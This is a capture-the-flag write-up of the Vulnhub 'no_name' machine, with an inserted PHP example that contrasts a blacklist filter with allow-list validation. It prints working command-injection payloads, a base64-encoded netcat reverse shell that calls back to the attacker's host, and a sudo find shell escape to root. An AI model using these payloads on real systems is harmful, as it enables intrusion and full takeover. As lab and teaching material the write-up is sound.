
haclabs: no_name - Vulnhub Walkthrough

infosecnoodle


This is my first ever Medium post, and my first CTF writeup. “no_name” is a vulnerable machine from Vulnhub which was released by haclabs as part of the haclabs series. Here is my writeup explaining how I exploited this machine from boot to root. Enjoy!

Level: Beginner/Intermediate

arp-scan or netdiscover can be used to discover the IP address the machine has been leased. On my network, the machine was assigned the IP address 192.168.10.42. Let’s scan this machine using nmap.

sudo nmap -sV -p- 192.168.10.42

The nmap scan revealed an Apache server running on port 80. This was the only open port on the machine, so we can assume that our foothold on this box will be through a vulnerable web application or script (since this is a CTF, after all!).

Nmap scan report for 192.168.10.42
Host is up (0.0083s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Visiting the webpage, we are prompted with a “Fake Admin Area” field which, when given a query, returns “Fake ping executed”.


index.php showing a response after the query “test” was given.

I wasn’t finding many interesting things on this page even after viewing the source code, so I decided to use dirb to scan for other php pages that may be hosted on the server. The -X .php option specifies which file extension we wish to enumerate.

dirb http://192.168.10.42 /usr/share/wordlists/dirb/big.txt -X .php


Dirb results

We found something interesting! The file “superadmin.php” is hosted on the server. Let's take a look!

superadmin.php

We can see that we have a ping function to play with - let’s try google.com to see if it actually works.


A successful ping!

The ping works! The server is using the ‘ping’ command to produce the response, so how could we exploit this to execute our own commands? Let’s do a quick Google search.

I came across this webpage which explains how to exploit this type of application. If the user input is not sanitised, we can trick this input field to execute our own commands. After trial and error, I discovered that the character “|” after a loopback ping gives us some basic command execution.

For example:

ping 127.0.0.1 | id

Successful command execution!

After getting all excited, I tried to get myself a reverse netcat shell. However, this did not work. After viewing the php code of ‘superadmin.php’, it was easy to see why. I did this by using the same above technique, but instead of “id” the command was “cat superadmin.php”.


A portion of the php code for the application.

This makes sense now: the application has restricted certain commands from being executed. We may need to think outside the box to get this to work. My first idea was to use nc.traditional; however, this would still be detected by the application because the string “nc” appears in it.

How could we make it so that the application can’t see our commands? Encoding! Let’s go for Base64.
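The following is an added example and not the machine’s own superadmin.php (the post only shows a fragment of it). It contrasts a substring blacklist of the kind the walkthrough describes, which an encoded payload slips past, with an allow-list check that only accepts an IP address or hostname; both functions only build the command string rather than executing it, and the base64 blob is a placeholder.

```php
<?php
// Added example (not the vulnerable machine's code). Both functions BUILD the
// ping command and return it (or null when the input is rejected) so the file
// is safe to run; a real handler would pass the result to shell_exec().

// Blacklist in the style the walkthrough describes: it rejects a handful of
// tokens such as "nc" but has no model of what a valid ping target looks like.
function build_ping_blacklist(string $input): ?string
{
    $banned = ['nc', ';', '&&', '&', 'bash', 'sh '];
    foreach ($banned as $token) {
        if (stripos($input, $token) !== false) {
            return null; // "command blocked"
        }
    }
    // "|" and backticks are not on the list and the base64 text contains none
    // of the banned substrings, so the decoded payload reaches the shell.
    return 'ping -c 2 ' . $input;
}

// Allow-list: accept only an IP literal or a DNS hostname, then quote it.
// escapeshellarg() is defence in depth; the validation is what keeps shell
// metacharacters out in the first place.
function build_ping_allowlist(string $input): ?string
{
    $isIp   = filter_var($input, FILTER_VALIDATE_IP) !== false;
    $label  = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $isHost = strlen($input) <= 253
           && preg_match("/^(?:{$label}\\.)*{$label}$/", $input) === 1;
    if (!$isIp && !$isHost) {
        return null; // "invalid host"
    }
    return 'ping -c 2 ' . escapeshellarg($input);
}

// Constructed inputs: a normal target and the injection shape from the post,
// with placeholder base64 in place of the encoded reverse-shell command.
$benign  = 'google.com';
$payload = '127.0.0.1 | `echo "QkFTRTY0X1BMQUNFSE9MREVS" | base64 -d`';

foreach ([$benign, $payload] as $in) {
    printf("blacklist: %s\n", build_ping_blacklist($in) ?? '(blocked)');
    printf("allowlist: %s\n", build_ping_allowlist($in) ?? '(rejected)');
}
```

Running it shows the blacklist passing the payload straight through while the allow-list rejects it and still accepts google.com.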


The command I want to execute:

nc.traditional -e /bin/bash 192.168.10.15 443

Let’s encode this to Base64 using base64encode.org


base64encode.org

Now, let’s use this in a command that decodes and executes it on the server, using the discovered vulnerability.

ping 127.0.0.1 | `echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAuMTUgNDQz" | base64 -d`

Looks good! Now let’s start our netcat listener on the corresponding port (for me, 443) and execute the command in the application. If this works, we should get a reverse shell calling back to our computer.


It works!

Since this is a raw netcat shell, it’s not the best working environment. We can use the following command(s) to determine whether python is present on the server so we can upgrade our shell.

which python
which python3

The server responded with “/usr/bin/python3/” and so we can upgrade our shell using:

python3 -c 'import pty; pty.spawn("/bin/bash")'


Now that we have a fully interactive tty shell as www-data, we can start enumerating the box further! Let’s take a look at the home directory.


In the user ‘yash’ directory, we can read the first flag which states:

Due to some security issues, I have saved haclabs password in a hidden file.

Since this is an easy/intermediate rated machine, we need to think simple. What command can we use to find hidden files? The “find” command, of course!

Using the following command, we can list every file owned by the user yash, hidden ones included.

find / -type f -user yash


Welp, that was easy.

There we have it! Let’s read that hidden file to see the password of the user haclabs. Once we know the password, we can simply switch users.


We are now the user ‘haclabs’!

Fantastic! We have escalated our privileges to haclabs and we know his password. Let’s go for root!

One of the first things we can do is try the command “sudo -l”, as this will list the commands we can run as root. This is not an option if you don’t know your user’s password; however, we do! Let’s try it.


The sudo -l command.

We can see that our user can run the binary ‘find’ with sudo privileges without needing a password. This makes things very easy for us! A great resource for this is GTFOBins, a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

Let’s see if we can break out to a shell using this binary. Since we can run the command with ‘sudo’, the shell it spawns will run as root, giving us root access to the whole server.


GTFOBins

Fantastic! Let’s see what the command is to break out to a shell…


Shell escape for Find

There it is. Now let’s run this command on the server with sudo and see what we get back. Here’s the command:

sudo /usr/bin/find . -exec /bin/sh \; -quit


Pwned!

We are now root! We’ve successfully compromised the server and gained full system access. Thanks for reading!